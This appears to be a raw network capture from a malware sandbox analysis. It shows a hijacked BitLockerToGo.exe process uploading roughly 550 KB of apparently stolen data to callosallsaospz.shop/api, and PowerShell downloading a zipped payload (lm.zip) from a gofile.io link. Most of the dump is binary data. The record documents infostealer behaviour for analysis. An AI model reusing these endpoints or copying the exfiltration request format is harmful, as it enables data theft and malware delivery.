                                                                                    2024-07-24 17:57:01 UTC685INData Raw: 55 4d 4f 56 62 54 6b 4e 56 71 52 30 34 4e 72 62 6a 78 45 47 4b 70 35 41 4a 38 55 39 50 45 43 4f 30 52 49 43 79 78 6f 5a 48 48 6e 30 63 2b 6a 4d 30 58 44 47 59 71 33 73 2b 57 44 6c 50 43 68 52 76 79 58 58 4b 38 47 45 63 4f 66 2b 57 6d 6b 6c 59 55 54 58 6b 6a 42 6c 58 34 2f 72 78 6d 61 4f 4a 61 57 61 47 51 7a 4c 42 73 73 57 74 56 44 37 42 61 62 61 53 46 76 77 4c 56 57 51 76 37 79 6c 36 63 4d 48 2b 46 2b 6a 71 53 4f 38 64 57 57 79 78 34 65 78 63 69 43 66 6c 53 5a 68 39 34 4b 65 71 6e 59 57 65 70 65 59 75 7a 59 6e 69 31 73 4c 36 5a 46 43 72 5a 38 63 6d 64 73 45 79 30 50 73 65 6c 30 49 35 4a 45 6e 39 32 66 46 30 70 73 38 51 54 68 48 59 6a 61 55 63 74 37 43 36 39 6d 70 6e 56 73 50 31 30 62 67 41 75 74 62 7a 76 6d 71 45 41 32 56 47 45 4d 63 35 44 77 69 70 6e 41
                                                                                    Data Ascii: UMOVbTkNVqR04NrbjxEGKp5AJ8U9PECO0RICyxoZHHn0c+jM0XDGYq3s+WDlPChRvyXXK8GEcOf+WmklYUTXkjBlX4/rxmaOJaWaGQzLBssWtVD7BabaSFvwLVWQv7yl6cMH+F+jqSO8dWWyx4exciCflSZh94KeqnYWepeYuzYni1sL6ZFCrZ8cmdsEy0Psel0I5JEn92fF0ps8QThHYjaUct7C69mpnVsP10bgAutbzvmqEA2VGEMc5DwipnA


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    23192.168.2.1049769188.114.96.34434216C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:57:02 UTC287OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 551715
                                                                                    Host: callosallsaospz.shop
                                                                                    2024-07-24 17:57:02 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 46 32 43 31 31 34 37 36 39 45 35 39 41 33 36 30 44 33 46 41 41 41 31 42 35 30 38 44 46 37 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 62 4f 4b 48 4e 4d 2d 2d 0d 0a 2d 2d 62
                                                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8F2C114769E59A360D3FAAA1B508DF78--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"bOKHNM----b
                                                                                    2024-07-24 17:57:02 UTC15331OUTData Raw: 61 8d 04 93 7e 17 2c e4 c7 ea bf 54 9b 38 b6 ad da 94 ca 0d 46 8e 75 9a 81 ec 38 32 0f 5e b3 4d 49 5d ca 74 54 de c6 4f e7 0e 2b d1 19 f6 e9 be 9d fd e8 66 2b 7b 60 ae bd af 56 b1 79 ca 92 7c e3 9c 36 61 9d 14 8b 3f da 30 6e 9b ec 6c de 1b 6a 98 82 8d 0a b4 d2 10 7a 59 27 e7 ff 5b f4 f6 8d d4 34 b1 20 8a cc a5 11 f7 ad 67 fb 70 39 f9 ca 7b 20 59 1d 8c 34 7c cd 51 a7 c0 bd 01 d0 da c1 20 77 b8 d4 0d 5a 8f 08 68 7d e1 00 48 43 c1 de 58 46 da 00 b5 02 0f ab 62 d8 7c a7 61 95 b9 bb 73 dd df 16 3f 2c 1c 9d 03 23 d1 4a d5 e2 d6 f0 5c f7 07 8f b6 aa 8f fd ba 9f 56 be 19 40 b4 59 99 bb fc da 98 00 7d 88 36 84 63 9f 25 80 c1 21 c5 ba 14 54 c3 6c 71 6c 97 c7 50 09 29 b9 a7 b6 a2 d9 6a 00 2c 3f 77 e5 bb 52 e6 e7 6c f1 c4 ba f8 b5 e2 95 eb e6 f1 c1 de 2e 1f fe b7 1d
                                                                                    Data Ascii: a~,T8Fu82^MI]tTO+f+{`Vy|6a?0nljzY'[4 gp9{ Y4|Q wZh}HCXFb|as?,#J\V@Y}6c%!TlqlP)j,?wRl.
                                                                                    2024-07-24 17:57:02 UTC15331OUTData Raw: 44 dd 88 d6 75 e9 fc 74 30 96 fb e8 96 83 bb f1 08 97 13 2a 55 2e ae cb 41 37 5c cb ed 62 a9 ac ff 6a 1d b5 c1 6a 69 c5 c3 a3 ce 56 da 3d 3e 9f 08 1e e5 d2 10 c4 2d 82 29 cd d4 4e 20 c6 c7 91 4f fb 5e db f7 92 af 36 59 c9 29 25 ac ec 65 42 68 59 70 b7 a8 93 23 47 5e 96 f7 f6 29 6a 14 a6 5e 34 db 03 db d1 17 8c c4 9c c1 c4 bd 75 98 07 7e 02 ce 3e 38 41 fb 58 71 b3 00 db 73 a7 09 7c 10 ee 71 d8 41 47 be 4a 8c 5b d4 0c ea 8d bb ac 5c 1e d7 5c 69 a3 17 4a 93 67 ba 34 91 21 b2 b5 a2 a9 3b 25 fb 47 88 fc 70 98 9a 74 41 9c 93 b2 3c 29 25 3c 00 9f b7 6d 5b 47 2e 67 16 ed 26 f6 24 ff cc 8a d3 97 9e 99 e7 39 5e 53 cf 4a db c0 70 aa 64 34 d4 b2 97 e8 33 a3 92 75 be 1c 79 76 db 4c fb 35 83 f2 3c 46 fa ed 51 d9 d4 3c 59 e5 fd 03 f1 1e 83 61 f9 0f 14 d2 46 3d 58 bc d2
                                                                                    Data Ascii: Dut0*U.A7\bjjiV=>-)N O^6Y)%eBhYp#G^)j^4u~>8AXqs|qAGJ[\\iJg4!;%GptA<)%<m[G.g&$9^SJpd43uyvL5<FQ<YaF=X
                                                                                    2024-07-24 17:57:02 UTC15331OUTData Raw: 0e e2 b9 0a a0 8b a5 51 65 5b 2f 7f ee 9a 4d a4 d5 87 e1 c4 61 27 c7 6e 0f 35 8b 3e 19 f2 be 71 7e e9 93 ff bb c9 33 f4 c1 c1 0b 3f 43 34 c9 ba 6a e8 29 ba 19 8e e2 fa 18 81 c8 1b bd 2f 60 f8 91 f8 40 5c 29 10 43 d8 77 22 78 b0 e5 6d 6b 65 da ed 9a 9b 3a 5f 80 95 2b 5e 33 1f fa c8 53 3b ab 7c 39 cd f0 8b 4c 2e fb ea 1d 02 2f e5 de fd d6 c4 b0 4c 36 7b ee e9 54 18 af 24 19 f8 cf e7 99 4f 51 17 78 0d ad bb bb 66 26 18 42 42 61 16 58 e2 61 5a 1e 2b 6d 4a 97 03 c4 d0 87 68 5c b4 a9 df 15 b4 10 47 fa fb 52 3d be d0 ba e9 cc 3b 6f e5 d4 ae ad 07 1d c4 89 7d 7a 97 7f 22 80 c5 0c 6e 09 66 ae 90 54 d4 b3 7c 87 fe d2 55 93 09 a0 15 4a 8a 8e 95 3e 0b c9 c7 5a 0c cb 58 87 9b 3a 00 bf ce 65 3a ea 66 cc 3d 38 40 90 fe 04 54 cf ea ac 8f 36 3a ad 5a c2 ba 67 e0 61 69 ae
                                                                                    Data Ascii: Qe[/Ma'n5>q~3?C4j)/`@\)Cw"xmke:_+^3S;|9L./L6{T$OQxf&BBaXaZ+mJh\GR=;o}z"nfT|UJ>ZX:e:f=8@T6:Zgai
                                                                                    2024-07-24 17:57:02 UTC15331OUTData Raw: 6e 0a 61 31 74 62 b0 c1 9f a0 0d cd 68 23 3f 23 43 59 fb f4 62 c8 65 b6 1b 71 27 3c ba de bb ef fb 90 04 22 99 db c8 29 55 61 9d de 44 6e 86 f6 8b 76 34 ce af 6e 06 c0 5e 25 77 fa 9f 27 c4 d3 78 77 30 61 5e 8c df 23 bc 95 aa 47 2f d6 9c 96 9e ed ba 4c 33 a4 0b df e9 2c 42 aa f5 69 6c 40 e0 c1 9e d1 1c 1d 4d 92 e9 46 e1 94 c8 65 55 99 dc 68 de f6 3f 86 4e fb 9a 21 b5 eb 44 d1 fb 22 7a 89 ed 0d f5 b6 9c 2b 60 1b bf 23 ba 71 eb 94 a8 32 ab 50 14 73 99 d8 58 f0 94 b8 29 b1 4f 84 7e 13 17 3c 07 8a 5a 83 11 8c 82 03 e5 5b 5b a5 3c df de 1e 1a 61 a5 a4 3c f2 ae 79 8f 64 67 06 17 97 86 45 51 1a 87 86 97 e5 b8 71 47 92 42 34 34 95 22 a8 d3 3c 5e f4 7b f3 83 91 f8 ea f1 79 9f 7d f8 2b ff 8f e2 69 8a a2 fe 3f 4b 66 00 1a 7e 7a ef 80 38 2f 30 72 56 95 06 f9 03 7f 27
                                                                                    Data Ascii: na1tbh#?#CYbeq'<")UaDnv4n^%w'xw0a^#G/L3,Bil@MFeUh?N!D"z+`#q2PsX)O~<Z[[<a<ydgEQqGB44"<^{y}+i?Kf~z8/0rV'
                                                                                    2024-07-24 17:57:02 UTC15331OUTData Raw: 3c a0 3c 02 36 c3 82 c8 7d b4 5a 0c b0 0a 6a 48 c9 a3 aa 66 b7 aa 1e 1b 0a 1a f8 a1 93 7d c7 bc 4a 87 00 b2 4c f3 5e 35 ba 1f e4 90 3f 20 9b 0c c8 47 79 41 f1 23 8c 6f 1f 47 ff b9 ce bc 7b 1e 1f 18 ba 4e c0 54 d7 f6 d0 42 21 2a 04 41 9e b4 bc e5 a7 13 c9 ae 18 0b 88 ee 57 0c 26 20 32 27 03 bf 75 5d 28 90 30 6b e9 9b 9a 2b a2 5b e3 e3 b4 1b b1 af 7a 7e 22 70 7c ea 60 23 02 90 cb a0 4e f6 ac bb e4 ba 07 fa 09 2d f5 54 fd b4 d6 9f 20 16 4a c1 06 70 60 d9 99 ab 83 7a e4 12 4c 29 4f 37 22 7a 09 49 f0 5d 45 24 7e 58 10 62 5a 82 c6 ac 7b 07 cb 5e dd a9 ff 63 a2 61 9e 96 72 09 38 a7 7e 74 69 7d 06 13 f6 ee 96 4b b7 84 41 48 27 6f 9e e7 84 05 33 64 dc 0e df d2 ee 50 12 75 9a ce 07 79 71 ac e5 1b 7c 91 21 4b 4b 52 fb 6b 55 30 58 21 cc af a9 86 48 fb ca f3 59 16 ea
                                                                                    Data Ascii: <<6}ZjHf}JL^5? GyA#oG{NTB!*AW& 2'u](0k+[z~"p|`#N-T Jp`zL)O7"zI]E$~XbZ{^car8~ti}KAH'o3dPuyq|!KKRkU0X!HY
                                                                                    2024-07-24 17:57:02 UTC15331OUTData Raw: ca 29 c8 90 5e 81 ec 3c 22 ea 3e 88 0e 13 4f 6b dd 51 de 7b ed b3 fa 9e e4 61 2b 17 a6 8b e8 3c 95 fd b7 62 a2 78 d8 4d e5 82 40 81 d3 bf d0 48 0b fa 46 82 e1 5c e3 00 a5 44 f4 e4 29 db 74 53 b3 93 31 ee 33 b9 01 44 41 48 d0 16 e8 03 93 d8 02 c1 e0 bb 6a d4 0c a9 70 3f ec e5 ae 01 0a 8e a8 1c 76 19 a5 b9 0a 10 c2 43 71 2e f6 6a f7 3d c4 4e fc 07 ef 7f 57 2f 7d 49 e7 f8 d8 2f 38 52 ac bf 13 76 d3 91 b2 93 f7 3c 8a 79 83 de 6d 72 b3 fd 8b c7 db 88 1f 0f 45 0d 6f b7 da 8e a7 69 c3 d7 47 b1 d6 b8 c4 04 2f 33 22 81 4a 2c e3 e3 85 9b 09 73 2d d7 92 d9 c8 19 0c 28 16 b0 cb ac 15 c8 22 21 96 7c 9a d2 22 6a ac 79 79 53 20 da f1 c3 2b 09 d0 79 58 ba fe ce d1 c3 dd 57 b8 7f 68 94 b5 b5 6b 5d 8d 94 1d d6 c2 0e 5b 9f 54 50 c2 53 a8 d8 9f da 69 57 e0 cf 5e 35 d2 df 59
                                                                                    Data Ascii: )^<">OkQ{a+<bxM@HF\D)tS13DAHjp?vCq.j=NW/}I/8Rv<ymrEoiG/3"J,s-("!|"jyyS +yXWhk][TPSiW^5Y
                                                                                    2024-07-24 17:57:02 UTC15331OUTData Raw: 5c b9 c3 4b 18 ba 01 48 93 32 ea 02 30 ee a1 12 e0 c7 bc 60 d4 1c 56 a9 07 7a 16 6d fd 09 e1 a6 9d 77 4f 15 92 ef 05 bc 93 77 fe 56 81 3c ae 83 9b 68 25 d2 04 64 e3 88 05 27 be 6b 88 3e 6c fc e3 89 06 81 3c 42 c7 15 9c d9 e8 33 a5 aa 89 81 1b 0c 2a 8a 59 7c 48 ff 36 06 04 a3 21 10 82 dd d6 1f f9 ae 05 6f c7 20 87 b1 80 94 a5 94 78 1e 14 48 08 f0 03 c2 3a 91 17 c4 a7 32 57 8a 60 d4 0f d9 02 70 9a f5 9e 0e 8c 28 24 e4 db 46 d5 86 7b b8 81 3b 82 e9 5c 12 0f eb 59 74 83 e1 a3 dc f5 f7 72 11 38 f7 32 5b 14 fb f0 c2 85 17 a4 d7 f1 15 39 02 e0 20 63 ec 49 e0 f4 64 d5 1f 12 05 2a 3b df e1 38 14 e4 07 fb b1 19 53 3c 98 a1 13 ed df 18 c6 bb 3b 8b dc bf a1 0c 90 b8 64 c3 3d 1a 1d 8e 5c 40 14 28 e3 72 5f c1 2c 19 ce 7f 0d 5b a0 15 c7 9e 0e 86 bf 5b 88 f4 e5 e1 65 61
                                                                                    Data Ascii: \KH20`VzmwOwV<h%d'k>l<B3*Y|H6!o xH:2W`p($F{;\Ytr82[9 cId*;8S<;d=\@(r_,[[ea
                                                                                    2024-07-24 17:57:02 UTC15331OUTData Raw: 48 24 73 e3 83 35 1e 53 9e d2 01 e9 1b 93 66 d6 3f d0 c8 ee fe 2a 4c 3a 41 cb f9 1f bb 27 cc 2f 38 02 93 23 30 8e ad 4c af f4 6c f0 16 59 16 17 09 eb da 5f fc f8 01 06 0e 54 c1 2f 23 27 de cc 94 cd 7e 64 6c 23 82 b4 eb 27 18 e9 bd 51 47 92 e4 d9 b9 2d 5b 4d 8a 9e 45 58 69 66 79 f8 ae cc ec 6b 74 3f 8a 46 4d ec f7 18 3d 64 d4 1a ff c6 b1 08 b7 f7 6e ea 54 5d cb 5f f5 c5 57 dd 8a db 22 f8 79 9e 7e ac 32 0c 43 f6 f1 07 cd 3d 93 33 98 8d 5a 8f 3f c1 0c 6f f2 4c ed 40 60 41 c8 70 45 ee 88 eb 5a fe c8 ad a1 2e 5e 49 6c c8 d2 37 8b 32 73 af 74 9f 88 29 53 93 df 5d b6 ad 57 3b b7 b7 5d 6b d8 de 16 d7 3e bd 98 23 c3 f2 59 f5 46 8c 7e 08 f4 28 3e 99 42 a0 2e c4 6f bc f3 0b 50 0f 4f 9c 20 29 7c 5b 92 80 98 b3 81 69 96 24 42 7e fa b2 8d ad d3 87 da 9c c8 f1 9c ff f5
                                                                                    Data Ascii: H$s5Sf?*L:A'/8#0LlY_T/#'~dl#'QG-[MEXifykt?FM=dnT]_W"y~2C=3Z?oL@`ApEZ.^Il72st)S]W;]k>#YF~(>B.oPO )|[i$B~
                                                                                    2024-07-24 17:57:02 UTC15331OUTData Raw: ef 57 88 75 00 59 ff 40 24 5a 68 46 83 91 cc 06 09 61 52 24 02 b8 e8 c8 78 c9 e3 91 35 97 fb 76 be 6b 0f 22 81 fd e3 5f 65 5c 5d e6 af fd bd 1a 30 f3 91 b1 6d 36 9e b9 db 48 f1 5e 3a 5d d3 cc 3c ca 9e 39 6c 6a 84 91 23 b4 0b 16 2e 65 0b bc 57 4f 4c 88 1b 34 db c4 af e3 f4 9c a3 64 a9 ee 16 66 e0 51 0f f7 ef 28 ef 38 53 58 71 e3 4c 4d e8 1d e1 e2 30 6c 10 ea 67 8e 43 8e bc ba fc f1 a0 e1 c0 1f 4f d6 17 bf fa a8 fa e1 9f 35 9b 91 56 ad 12 36 87 9a c6 da 36 bc 23 f4 31 34 37 5d bb 60 b9 e1 c0 bd b3 22 11 2b 9f 64 37 4f 3f db 79 5a e8 8f e5 4a a0 2a 4b 76 cf b9 80 1a 4a 91 ec 40 ba 3d de 19 bd 62 c9 b6 b1 0d be c5 09 f9 71 23 49 52 5f 5c 50 d1 02 8e e2 b1 71 29 51 8c 27 d2 22 cb e2 6b 93 ea 19 c7 77 47 a9 c8 3d fe d6 f6 32 64 12 b9 fe de ef ba 06 34 56 98 ff
                                                                                    Data Ascii: WuY@$ZhFaR$x5vk"_e\]0m6H^:]<9lj#.eWOL4dfQ(8SXqLM0lgCO5V66#147]`"+d7O?yZJ*KvJ@=bq#IR_\Pq)Q'"kwG=2d4V
                                                                                    2024-07-24 17:57:03 UTC808INHTTP/1.1 200 OK
                                                                                    Date: Wed, 24 Jul 2024 17:57:03 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=ep2fbhlqlaljigsu1s1gne8mhq; expires=Sun, 17-Nov-2024 11:43:42 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9Yk599aFNyEb4xWcGCWXOic3xP743fkh%2B5COVTf7Ost6xFu0FqQzEk6IbkmOXvFUgD1tQvCHD4fuKDQXNFRyGzEIRwxeOoDqYXeKJgMxK0X%2Fo5jpI5LR43%2FADmGWEHnBZNX8Ku95lA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8a85ca503dd943b8-EWR
                                                                                    alt-svc: h3=":443"; ma=86400


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    24192.168.2.104977031.14.70.2454436872C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:57:02 UTC196OUTGET /download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                    Host: store4.gofile.io
                                                                                    2024-07-24 17:57:02 UTC577INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.27.0
                                                                                    Date: Wed, 24 Jul 2024 17:57:02 GMT
                                                                                    Content-Type: application/zip
                                                                                    Content-Length: 528925
                                                                                    Connection: close
                                                                                    Accept-Ranges: bytes
                                                                                    Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization
                                                                                    Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range
                                                                                    Content-Disposition: attachment; filename*=UTF-8''lm.zip
                                                                                    Last-Modified: Sat, 20 Jul 2024 15:36:00 GMT
                                                                                    2024-07-24 17:57:02 UTC3541INData Raw: 50 4b 03 04 14 00 00 00 08 00 15 7b f3 58 c4 92 38 a6 85 28 05 00 fb 29 05 00 08 00 00 00 64 61 74 61 2e 62 69 6e 00 1f 2c e0 d3 60 9c e8 00 00 00 00 5e b9 dc 29 05 00 b2 c8 30 94 0e 17 00 00 00 02 94 0e 17 00 00 00 e2 f0 92 75 77 e0 85 72 c2 bd 55 09 ce ca ca 84 3b 3f 3f 0e c2 8b 6b 30 14 f1 48 5f 7b 5a 41 91 0d 98 6b bd 94 61 e5 1b 0f c7 0d e8 65 1b 1e 86 14 20 20 20 20 20 de 75 6a 5f b1 2f fb 26 7b 45 0a be 05 ce 79 a3 39 b7 9a 41 a5 20 83 99 3c e6 22 4c 5c 50 75 cc ac e5 bf bb 2b 64 04 96 20 44 f6 f2 9e fe a4 c7 03 8b c5 fc 9a db 81 f9 b6 56 87 3e 30 c0 10 f4 29 a7 48 41 3b 11 24 9d e8 5a 82 2f 28 ea db 56 e9 10 b5 2d be c2 89 6f 5a b4 5b 18 da 65 94 95 19 65 cb 0e 2a 07 ab d8 36 9d 69 45 5b bd d9 93 47 b7 30 36 34 d4 e2 c4 5e 50 b0 df 6a 5e a1 fd 2a
                                                                                    Data Ascii: PK{X8()data.bin,`^)0uwrU;??k0H_{ZAkae uj_/&{Ey9A <"L\Pu+d DV>0)HA;$Z/(V-oZ[ee*6iE[G064^Pj^*
                                                                                    2024-07-24 17:57:02 UTC4096INData Raw: e1 d7 09 8a 1f 1b d0 f3 8c 65 10 0b ba 00 12 5e 66 40 a3 ff 37 fb 4f 9a 1d 87 2f 82 36 f4 97 a3 a2 53 35 44 6f 49 46 a1 46 00 8c 61 7f 68 00 8d ef 47 ca e0 aa b1 d3 ce 3b 74 24 f4 37 8a eb 6f 8a 85 e2 50 1a 36 92 c1 61 33 9a cd 39 40 81 b9 a4 1f 2d 96 33 eb c0 a7 40 91 64 06 6b 0a 7c 15 c6 37 61 b3 a5 8f 0f d0 76 ea 2c b1 70 be 08 49 92 2f 88 eb 19 ba ee e7 6f be 55 70 4e 25 d9 b6 4a d5 1e e6 00 c1 6e e1 51 51 e6 8b 6b 90 92 92 28 57 17 e5 ae bf 5d 13 52 62 33 a2 6f 4a f6 63 f0 7b e6 0f f1 6b 80 62 58 0a 0f 75 b5 73 fd 1b d2 35 64 5c 28 07 40 16 e4 f1 d7 01 04 42 be b3 07 73 de 63 fe a0 d3 31 7f ec 6b 25 52 e9 b3 2e 6b 82 3d a6 71 71 ad 75 b0 c3 e3 56 db 95 02 b0 6a 4b 8c 23 9d 32 29 9f 9a 2f 22 e9 ce 6c 41 ce 20 22 ae 05 71 70 69 ed 12 8d 24 90 44 c7 97
                                                                                    Data Ascii: e^f@7O/6S5DoIFFahG;t$7oP6a39@-3@dk|7av,pI/oUpN%JnQQk(W]Rb3oJc{kbXus5d\(@Bsc1k%R.k=qquVjK#2)/"lA "qpi$D
                                                                                    2024-07-24 17:57:02 UTC4096INData Raw: 48 fd 37 b9 28 c3 5e 1e 02 ee 02 e9 bb bc 2a 1f 47 11 3e 30 35 15 0e 91 97 83 63 a4 5e 11 28 8c 43 df ca f4 39 71 7e a7 b7 17 8a 88 8a 2c d6 0e a3 6d 8b a7 ca 40 71 19 c7 ee 18 2d 61 d5 3f ea 52 90 cd a3 fb fa ad e3 54 0b cb 44 61 90 88 c6 26 dd c6 72 aa 71 7f 0e 87 91 5f 8a c0 b2 da 7c c3 9e 58 36 2f cf 02 fb 2f 5f e8 60 27 a9 e3 6e db 0d 8b 86 d3 9c de 6b 31 80 d0 11 88 df e6 1e c4 df 48 88 95 bb 84 61 04 01 87 0e bd 7c 0a 96 2f d6 f3 b7 ee b1 1d 8e 02 3a 2a 17 d9 64 4c aa a0 5e 61 83 81 40 cf ac 9b 0a 45 89 98 67 bf af a6 d6 a8 0c f3 55 de a0 ce 55 90 e1 7a 18 69 eb 70 93 6a 69 16 39 3e 2d b9 ce f2 80 ed c7 6b ad 99 39 86 ce dc 48 72 0f 2d 36 23 1b 59 73 0f 89 22 86 ce f1 ee 1f 71 95 e6 2a 5a bc a1 22 70 a3 7c 0c 5c 1c 14 b2 09 d0 8f 2b 0b 14 19 47 de
                                                                                    Data Ascii: H7(^*G>05c^(C9q~,m@q-a?RTDa&rq_|X6//_`'nk1Ha|/:*dL^a@EgUUzipji9>-k9Hr-6#Ys"q*Z"p|\+G
                                                                                    2024-07-24 17:57:02 UTC4096INData Raw: 9f c6 61 c7 00 01 56 58 ea b9 7e 02 01 c1 66 77 6b 3e d9 ee 41 91 c6 1f 4f 04 57 ff 2d 4c cd 0b 82 c3 03 e3 6f f1 cc 47 4d f8 95 e8 db 55 a7 c9 58 ab 76 6a d1 8a ae 5d 93 6a 5d 19 20 57 27 d4 79 f0 5c 4f 9a 7e d9 35 46 7e 3b 7d db 9a 36 ae 77 55 e2 7d b6 9b 16 83 5c 91 40 b2 e7 4b 1d 05 be 9c 78 84 c5 6e c1 09 34 c8 9b 9b 43 8f b2 47 51 4a eb 76 f5 4f 7a 02 09 d5 08 a3 41 85 33 b5 82 a9 fd ce ea 1a 43 ee 58 84 78 d3 c4 70 57 55 91 45 a9 0b 30 2b ef 9e b8 d3 10 ba 9d fd 7a 09 54 68 36 30 e9 6a 65 22 c4 bd 08 fe 01 87 ee 51 a9 f4 a3 2c cd 1b d4 b3 5a 7d 17 6d 28 ba 03 58 5c d8 1b 8b 33 51 75 ca f7 25 af 88 66 79 01 6c 03 a9 1a 72 c8 2e 4f a5 25 f7 1a 0c f8 57 3c 48 6a 19 21 54 23 e5 c1 64 00 94 1d eb ee dc e0 05 54 71 fb 73 b7 f4 19 27 8f 25 7a 3e 81 14 34
                                                                                    Data Ascii: aVX~fwk>AOW-LoGMUXvj]j] W'y\O~5F~;}6wU}\@Kxn4CGQJvOzA3CXxpWUE0+zTh60je"Q,Z}m(X\3Qu%fylr.O%W<Hj!T#dTqs'%z>4
                                                                                    2024-07-24 17:57:02 UTC4096INData Raw: dd fc 5d 03 e2 da ea ed f3 ea 57 d7 0c b6 63 eb c8 96 1e 06 92 83 77 43 3e 49 04 09 62 7d f7 4b a3 96 c9 67 6f 00 6d 03 09 19 16 57 20 83 a3 f5 b2 d0 ae 12 f9 60 fb cc a0 0d 97 e1 81 d5 63 9b 40 17 c7 6c 85 7e 76 fe 3b 55 6a 31 bf a4 a1 16 7a 3c 8b af fd 2a 3b 4a 5f 02 79 75 df 07 2f ec e3 89 3d 34 0a ae 62 d1 9e ac b5 0f 90 2f a5 a9 7e 9d bf a5 ed 11 23 a7 25 c1 ec a2 cb 45 2b c8 9a 0e 17 6d bd 5d b3 28 e5 c6 a9 c7 d1 a8 3f 07 94 8b b8 27 31 d2 4a d0 19 c4 6f 60 76 ea 8f e6 20 08 ae a2 10 53 14 d3 d4 32 b4 94 a7 d6 b7 4d 89 42 b3 33 e3 48 f2 eb bf 8e bc 99 e6 cc b5 c1 36 7e 00 32 ba e8 79 9f 05 ca 10 bd d7 6e 81 cc c8 d4 e4 f1 d0 09 c3 69 20 9a 51 01 f7 19 ec 74 89 e8 18 a0 44 10 51 cd e7 61 84 6f 50 9f a7 12 ea a3 e8 93 05 84 a1 ad 57 36 9f 34 50 a0 5f
                                                                                    Data Ascii: ]WcwC>Ib}KgomW `c@l~v;Uj1z<*;J_yu/=4b/~#%E+m](?'1Jo`v S2MB3H6~2yni QtDQaoPW64P_
                                                                                    2024-07-24 17:57:02 UTC4096INData Raw: e4 09 5e 08 b9 49 16 aa 7e bf d1 b7 a4 93 08 85 34 5d 4f b9 dd ad 42 f9 49 8f 55 bc cb 86 e7 28 6e 12 07 5d 86 47 db fc 99 78 61 90 0e c2 40 78 62 4c ed bf 6d d7 c8 3f 50 f8 25 58 df 00 4f aa 0c 2c 09 1e ea df d2 21 b3 49 ec 21 e7 c1 f3 71 1f c1 7d 8a c6 bc 43 86 fd c9 be 99 2c cf 45 9b b3 b9 4c 95 9f 05 6f dd c0 e9 02 a9 31 0a 77 98 52 8b 76 e4 1c 0a bd bf db cb c8 10 1f 0f 35 c7 73 2f 2d dc 87 65 17 e8 05 d2 b1 56 91 df 3a 3c 1e 07 ad b3 f1 fa e3 5a 20 c9 9a 3d 77 0e 67 1c 07 48 11 b8 04 af 5a db 43 ad bb ba 10 29 89 26 05 82 6c e4 dd 29 f1 f9 7b 61 0a 54 97 6d 54 88 32 55 d3 9f 1e d2 88 ba 5a 63 bc 94 d7 d8 fc 1d 93 6f 0c c6 ba 6d 5d 4d 59 61 26 e7 25 57 aa 02 36 36 e2 23 ec a8 1e c5 ca 6c 7b 96 0d 99 01 31 b9 44 37 e1 42 7c 0d b7 e0 37 29 61 b4 6e ec
                                                                                    Data Ascii: ^I~4]OBIU(n]Gxa@xbLm?P%XO,!I!q}C,ELo1wRv5s/-eV:<Z =wgHZC)&l){aTmT2UZcom]MYa&%W66#l{1D7B|7)an
